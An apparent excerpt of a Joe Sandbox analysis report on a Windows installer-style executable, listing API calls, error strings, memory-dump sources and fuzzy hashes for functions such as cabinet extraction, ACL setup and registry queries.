                                                                                                                                                                    • Failed to get value as string for variable: %ls, xrefs: 0090740C
                                                                                                                                                                    • *****, xrefs: 009073D9, 009073E6
                                                                                                                                                                    • Failed to format value '%ls' of variable: %ls, xrefs: 009073E7
                                                                                                                                                                    • Failed to get variable: %ls, xrefs: 0090737F
                                                                                                                                                                    • Failed to get unformatted string., xrefs: 009073AE
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                                                                                    • String ID: *****$Failed to format value '%ls' of variable: %ls$Failed to get unformatted string.$Failed to get value as string for variable: %ls$Failed to get variable: %ls
                                                                                                                                                                    • API String ID: 3168844106-2873099529
                                                                                                                                                                    • Opcode ID: fba2510c1d230e410f12c4f07bb6ef404345a31cc7fdb128402d6d78f89d2d36
                                                                                                                                                                    • Instruction ID: 73dddfa7fbfec175dc5647226c10d9264bac0fd3c7b9fbe27b93e7d81d141806
                                                                                                                                                                    • Opcode Fuzzy Hash: fba2510c1d230e410f12c4f07bb6ef404345a31cc7fdb128402d6d78f89d2d36
                                                                                                                                                                    • Instruction Fuzzy Hash: 8831AD32D0962AFFDF216E90CC05F9EBA69EF54331F008525FD10661A0E375BA50ABD0
                                                                                                                                                                    APIs
                                                                                                                                                                    • InitializeAcl.ADVAPI32(?,00000008,00000002,0000001A,00000000,?,00000000,00000000,?,?,00000000), ref: 00918E37
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00918E41
                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000080,?,00000001,20000004,00000000,00000000,?,00000000,00000003,000007D0,?,00000000,00000000,?,?), ref: 00918EA1
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to initialize ACL., xrefs: 00918E6F
                                                                                                                                                                    • cache.cpp, xrefs: 00918E65
                                                                                                                                                                    • Failed to allocate administrator SID., xrefs: 00918E1D
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AttributesErrorFileInitializeLast
                                                                                                                                                                    • String ID: Failed to allocate administrator SID.$Failed to initialize ACL.$cache.cpp
                                                                                                                                                                    • API String ID: 669721577-1117388985
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?,00000000,crypt32.dll,?,?,00914028,00000001,feclient.dll,?,00000000,?,?,?,00904B12), ref: 0090424D
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00914028,00000001,feclient.dll,?,00000000,?,?,?,00904B12,?,?,0094B488,?,00000001), ref: 00904259
                                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,?,?,00000000,?,?,00914028,00000001,feclient.dll,?,00000000,?,?,?,00904B12,?), ref: 00904294
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00914028,00000001,feclient.dll,?,00000000,?,?,?,00904B12,?,?,0094B488,?,00000001), ref: 0090429E
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CurrentDirectoryErrorLast
                                                                                                                                                                    • String ID: crypt32.dll$dirutil.cpp
                                                                                                                                                                    • API String ID: 152501406-1104880720
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to write during cabinet extraction., xrefs: 00920C35
                                                                                                                                                                    • Unexpected call to CabWrite()., xrefs: 00920BC1
                                                                                                                                                                    • cabextract.cpp, xrefs: 00920C2B
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLastWrite_memcpy_s
                                                                                                                                                                    • String ID: Failed to write during cabinet extraction.$Unexpected call to CabWrite().$cabextract.cpp
                                                                                                                                                                    • API String ID: 1970631241-3111339858
                                                                                                                                                                    APIs
                                                                                                                                                                    • _MREFOpen@16.MSPDB140-MSVCRT ref: 00909AFB
                                                                                                                                                                    • GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,00000000,00000000,?,0090A8B4,00000100,000002C0,000002C0,00000100), ref: 00909B10
                                                                                                                                                                    • GetLastError.KERNEL32(?,0090A8B4,00000100,000002C0,000002C0,00000100), ref: 00909B1B
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to format variable string., xrefs: 00909B06
                                                                                                                                                                    • Failed while searching directory search: %ls, for path: %ls, xrefs: 00909B54
                                                                                                                                                                    • Failed to set variable., xrefs: 00909B7A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AttributesErrorFileLastOpen@16
                                                                                                                                                                    • String ID: Failed to format variable string.$Failed to set variable.$Failed while searching directory search: %ls, for path: %ls
                                                                                                                                                                    • API String ID: 1811509786-402580132
                                                                                                                                                                    APIs
                                                                                                                                                                    • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00920CC4
                                                                                                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00920CD6
                                                                                                                                                                    • SetFileTime.KERNEL32(?,?,?,?), ref: 00920CE9
                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF,?,?,?,?,?,?,?,?,?,?,?,?,009208B1,?,?), ref: 00920CF8
                                                                                                                                                                    Strings
                                                                                                                                                                    • Invalid operation for this state., xrefs: 00920C9D
                                                                                                                                                                    • cabextract.cpp, xrefs: 00920C93
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Time$File$CloseDateHandleLocal
                                                                                                                                                                    • String ID: Invalid operation for this state.$cabextract.cpp
                                                                                                                                                                    • API String ID: 609741386-1751360545
                                                                                                                                                                    APIs
                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,crypt32.dll,00000000,00000000,00000000,?,0091539D), ref: 00914AC3
                                                                                                                                                                    Strings
                                                                                                                                                                    • crypt32.dll, xrefs: 00914A7D
                                                                                                                                                                    • Failed to allocate message to write., xrefs: 00914AA2
                                                                                                                                                                    • Failed to write message type to pipe., xrefs: 00914B05
                                                                                                                                                                    • pipe.cpp, xrefs: 00914AFB
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileWrite
                                                                                                                                                                    • String ID: Failed to allocate message to write.$Failed to write message type to pipe.$crypt32.dll$pipe.cpp
                                                                                                                                                                    • API String ID: 3934441357-606776022
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0090394F: GetProcessHeap.KERNEL32(?,000001C7,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903960
                                                                                                                                                                      • Part of subcall function 0090394F: RtlAllocateHeap.NTDLL(00000000,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903967
                                                                                                                                                                    • _memcpy_s.LIBCMT ref: 00914693
                                                                                                                                                                    • _memcpy_s.LIBCMT ref: 009146A6
                                                                                                                                                                    • _memcpy_s.LIBCMT ref: 009146C1
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _memcpy_s$Heap$AllocateProcess
                                                                                                                                                                    • String ID: Failed to allocate memory for message.$feclient.dll$pipe.cpp
                                                                                                                                                                    • API String ID: 886498622-766083570
                                                                                                                                                                    APIs
                                                                                                                                                                    • ShellExecuteExW.SHELL32(?), ref: 00943CC0
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00000000), ref: 00943CCA
                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,00000000), ref: 00943CFD
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseErrorExecuteHandleLastShell
                                                                                                                                                                    • String ID: <$PDu$shelutil.cpp
                                                                                                                                                                    • API String ID: 3023784893-2418939910
                                                                                                                                                                    APIs
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00909AC4
                                                                                                                                                                    Strings
                                                                                                                                                                    • Condition, xrefs: 00909A5F
                                                                                                                                                                    • `<u, xrefs: 00909AC4
                                                                                                                                                                    • Failed to select condition node., xrefs: 00909A7B
                                                                                                                                                                    • Failed to copy condition string from BSTR, xrefs: 00909AAE
                                                                                                                                                                    • Failed to get Condition inner text., xrefs: 00909A94
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FreeString
                                                                                                                                                                    • String ID: Condition$Failed to copy condition string from BSTR$Failed to get Condition inner text.$Failed to select condition node.$`<u
                                                                                                                                                                    • API String ID: 3341692771-266405526
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                                                                                    • API String ID: 0-1718035505
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,00905EB2,00000000), ref: 00940AE0
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00940AE7
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00905EB2,00000000), ref: 00940AFE
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressErrorHandleLastModuleProc
                                                                                                                                                                    • String ID: IsWow64Process$kernel32$procutil.cpp
                                                                                                                                                                    • API String ID: 4275029093-1586155540
                                                                                                                                                                    APIs
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00933479,00933479,?,?,?,0093A45C,00000001,00000001,ECE85006), ref: 0093A265
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0093A45C,00000001,00000001,ECE85006,?,?,?), ref: 0093A2EB
                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,ECE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0093A3E5
                                                                                                                                                                    • __freea.LIBCMT ref: 0093A3F2
                                                                                                                                                                      • Part of subcall function 0093521A: HeapAlloc.KERNEL32(00000000,?,?,?,00931F87,?,0000015D,?,?,?,?,009333E0,000000FF,00000000,?,?), ref: 0093524C
                                                                                                                                                                    • __freea.LIBCMT ref: 0093A3FB
                                                                                                                                                                    • __freea.LIBCMT ref: 0093A420
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharMultiWide__freea$AllocHeap
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3147120248-0
                                                                                                                                                                    APIs
                                                                                                                                                                    • Sleep.KERNEL32(000007D0,00000000,00000000), ref: 00918D18
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Sleep
                                                                                                                                                                    • String ID: Failed to calculate cache path.$Failed to get %hs package cache root directory.$Failed to get old %hs package cache root directory.$per-machine$per-user
                                                                                                                                                                    • API String ID: 3472027048-398165853
                                                                                                                                                                    • Opcode ID: 9f3ea515cf8d537eedbd3592f96e76405a66e1bbce171e759055bacdb8bceef5
                                                                                                                                                                    • Instruction ID: 07ddf88fceead0edb58a6cfec9a8003d04a2c9d5521e8041bb4c25977631a7ae
                                                                                                                                                                    • Opcode Fuzzy Hash: 9f3ea515cf8d537eedbd3592f96e76405a66e1bbce171e759055bacdb8bceef5
                                                                                                                                                                    • Instruction Fuzzy Hash: BE31E476B4072CBBEB22AA649C46FFF626C9F60711F114025FD00F62D1DA758D80A7A1
                                                                                                                                                                    APIs
                                                                                                                                                                    • DefWindowProcW.USER32(?,00000082,?,?), ref: 0091E985
                                                                                                                                                                    • SetWindowLongW.USER32(?,000000EB,00000000), ref: 0091E994
                                                                                                                                                                    • SetWindowLongW.USER32(?,000000EB,?), ref: 0091E9A8
                                                                                                                                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 0091E9B8
                                                                                                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 0091E9D2
                                                                                                                                                                    • PostQuitMessage.USER32(00000000), ref: 0091EA31
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Window$Long$Proc$MessagePostQuit
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3812958022-0
                                                                                                                                                                    • Opcode ID: 1011eefd05995f2a1ac76351e8a9ad5ce55f0b87c8dc0f4746c26c033a098a8d
                                                                                                                                                                    • Instruction ID: c09a336e4a30dbbcc6bde126739f3db06b6102a8e4538203d487b43368e98c19
                                                                                                                                                                    • Opcode Fuzzy Hash: 1011eefd05995f2a1ac76351e8a9ad5ce55f0b87c8dc0f4746c26c033a098a8d
                                                                                                                                                                    • Instruction Fuzzy Hash: F921C579208108FFDF119F68DC49EAA3B69FF85310F548618FD0A9A1A4C731DD90EB50
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to save state., xrefs: 0091C891
                                                                                                                                                                    • elevation.cpp, xrefs: 0091C9B8
                                                                                                                                                                    • Unexpected elevated message sent to child process, msg: %u, xrefs: 0091C9C4
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseHandleMutexRelease
                                                                                                                                                                    • String ID: Failed to save state.$Unexpected elevated message sent to child process, msg: %u$elevation.cpp
                                                                                                                                                                    • API String ID: 4207627910-1576875097
                                                                                                                                                                    • Opcode ID: 8609cb963a0080708370327c022770927087e0bf065289183cb8e6d900413132
                                                                                                                                                                    • Instruction ID: c194372198fcfb6bef529d963b7af0899edc9826ab9f5f5b49eeb5a774c3c19b
                                                                                                                                                                    • Opcode Fuzzy Hash: 8609cb963a0080708370327c022770927087e0bf065289183cb8e6d900413132
                                                                                                                                                                    • Instruction Fuzzy Hash: ED61E87A240508FFCB129F84CD01DA5BBB2FF48314715C899FAA95A632C732E861EF41
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0090394F: GetProcessHeap.KERNEL32(?,000001C7,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903960
                                                                                                                                                                      • Part of subcall function 0090394F: RtlAllocateHeap.NTDLL(00000000,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903967
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00947C74
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00947C7F
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00947C8A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FreeString$Heap$AllocateProcess
                                                                                                                                                                    • String ID: `<u$atomutil.cpp
                                                                                                                                                                    • API String ID: 2724874077-4051019476
                                                                                                                                                                    • Opcode ID: 1d98e6a5270638c41bee89d2bf66d0b52bde434ec7884ff39bedbeda471d9e5d
                                                                                                                                                                    • Instruction ID: 483dc8c4befb33f6aa749faa735538468d49d8f118a6067a55bc4523c7f481c3
                                                                                                                                                                    • Opcode Fuzzy Hash: 1d98e6a5270638c41bee89d2bf66d0b52bde434ec7884ff39bedbeda471d9e5d
                                                                                                                                                                    • Instruction Fuzzy Hash: 8E518E7190422EEFCB25DBA4C884FAEF7B9AF44711F114594E945AB250DB71EE00CBA0
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(00000000,000002C0,00000000,000002C0,00000000,00000000,000002C0,BundleUpgradeCode,00000410,000002C0,00000000,00000000,00000000,00000100,00000000), ref: 0094123F
                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,009170E8,00000100,000000B0,00000088,00000410,000002C0), ref: 00941276
                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,00000000,?,-00000001,00000004,00000000), ref: 0094136E
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
